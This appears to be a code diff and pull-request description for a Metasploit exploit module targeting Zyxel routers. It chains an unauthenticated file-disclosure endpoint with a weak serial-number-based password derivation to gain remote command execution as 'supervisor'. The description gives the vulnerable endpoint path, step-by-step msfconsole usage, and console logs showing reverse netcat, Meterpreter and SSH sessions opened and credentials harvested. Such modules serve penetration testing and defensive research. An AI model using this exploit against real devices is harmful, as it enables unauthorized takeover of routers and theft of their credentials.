+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if res.nil? || res.code != 200
 
     config = process_configuration(res)
 

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -316,6 +316,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_configuration(res)
+    # Initiate the instance variable config to store the configuration
+    @config = {}
+
     # Parse the device configuration json file
     res_json = res.get_json_document
     if res_json.blank?
@@ -411,7 +414,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     # Initiate the instance variable config to store the configuration
-    @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+    # @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
 
     res = get_configuration
     return CheckCode::Safe if res.nil? || res.code != 200
@@ -420,9 +423,7 @@ class MetasploitModule < Msf::Exploit::Remote
       process_configuration(res)
     rescue ProcessConfigException => e
       case e.exception_type
-      when 'ConfigNotVulnerable'
-        return CheckCode::Safe(e.message)
-      when 'ConfigUnreachable'
+      when 'ConfigNotVulnerable', 'ConfigUnreachable'
         return CheckCode::Safe(e.message)
       when 'ConfigUnknown'
         return CheckCode::Unknown(e.message)
@@ -432,11 +433,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # run if AutoCheck is NOT set, otherwise use the information gathered during the check method
-    unless datastore['AutoCheck']
-      # Initiate the instance variable config to store the configuration
-      @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
-
+    # run if AutoCheck is false (@config = nil), otherwise use the information in @config gathered during the check method
+    unless @config
       res = get_configuration
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if res.nil? || res.code != 200
 


### PR DESCRIPTION
This module exploits multiple vulnerabilities in the `zhttpd` binary (/bin/zhttpd) and `zcmd` binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.
The remote code execution vulnerability can be exploited by chaining the local file disclosure vulnerability in the `zhttpd` binary that allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.

With this information disclosure, the attacker can determine if the router is reachable via `ssh` and use the second vulnerability in the` zcmd` binary to derive the `supervisor` password by exploiting a weak password derivation algorithm using the device serial number.

After exploitation, an attacker will be able to execute any command as user `supervisor`.
For more info, read this article [Zyxel router chained RCE using LFI and Weak Password Derivation Algorithm (No CVE)](https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-router-chained-rce-using-lfi-and-weak-password-derivation-algorithm-no-cve) on [attackerkb.com](url).

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/zyxel_lfi_unauth_ssh_rce`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ]  `set target <0=unix command, 1=Linux dropper, 2=Interactive SSH>`
- [ ] `exploit`
- [ ] You should be able to get a session based on the target setting.

## Options
`STORE_CRED <true/false>` which allows you to store the derived credentials (supervisor) in the database of Metasploit.

## Scenarios

### Netcat session on a vulnerable Zyxel Router
```
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 0
target => 0
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
[+] The target is vulnerable.
[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
[*] SSH service is available and SSH Port 22 is open. Continue to login.
[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
[*] Authentication with derived supervisor password using Method2 is successful.
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:51236) at 2023-04-18 19:57:49 +0000

uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Mon Aug 27 19:59:01 CET 2018 mips GNU/Linux
id
uid=12(supervisor) gid=12 groups=12
exit

[*] 192.168.1.1 - Command shell session 1 closed.
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce)
```

### Meterpreter session on a vulnerable Zyxel Router
```
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 1
target => 1
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
[+] The target is vulnerable.
[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
[*] SSH service is available and SSH Port 22 is open. Continue to login.
[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
[*] Authentication with derived supervisor password using Method2 is successful.
[*] Executing Linux Dropper for linux/mipsbe/meterpreter/reverse_tcp
[*] Command Stager progress -  42.72% done (499/1168 bytes)
[*] Command Stager progress -  85.36% done (997/1168 bytes)
[*] Sending stage (1299256 bytes) to 127.0.0.1
[*] Command Stager progress - 100.00% done (1168/1168 bytes)
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.1:40364) at 2023-04-18 20:00:59 +0000

meterpreter > getuid
Server username: supervisor
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.36)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 2 closed.  Reason: User
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce)
```

### Interactive SSH session on a vulnerable Zyxel Router and storing the credentials of user supervisor
```
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 2
target => 2
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set STORE_CRED true
STORE_CRED => true
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
[+] The target is vulnerable.
[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
[*] SSH service is available and SSH Port 22 is open. Continue to login.
[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
[*] Authentication with derived supervisor password using Method2 is successful.
[*] Credentials for user:supervisor are added to the database...
[*] SSH session 3 opened (192.168.1.2:34493 -> 192.168.1.1:22) at 2023-04-18 20:07:36 +0000

uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Mon Aug 27 20:08:48 CET 2018 mips GNU/Linux
id
uid=12(supervisor) gid=12 groups=12
exit

[*] 192.168.1.1 - SSH session 3 closed.  Reason: User exit
msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > creds -u supervisor
Credentials
===========

host           origin         service          public      private   realm  private_type  JtR Format
----           ------         -------          ------      -------   -----  ------------  ----------
192.168.1.1    192.168.1.1    8080/tcp (http)  supervisor  2dc1a078         Password

msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > 
```

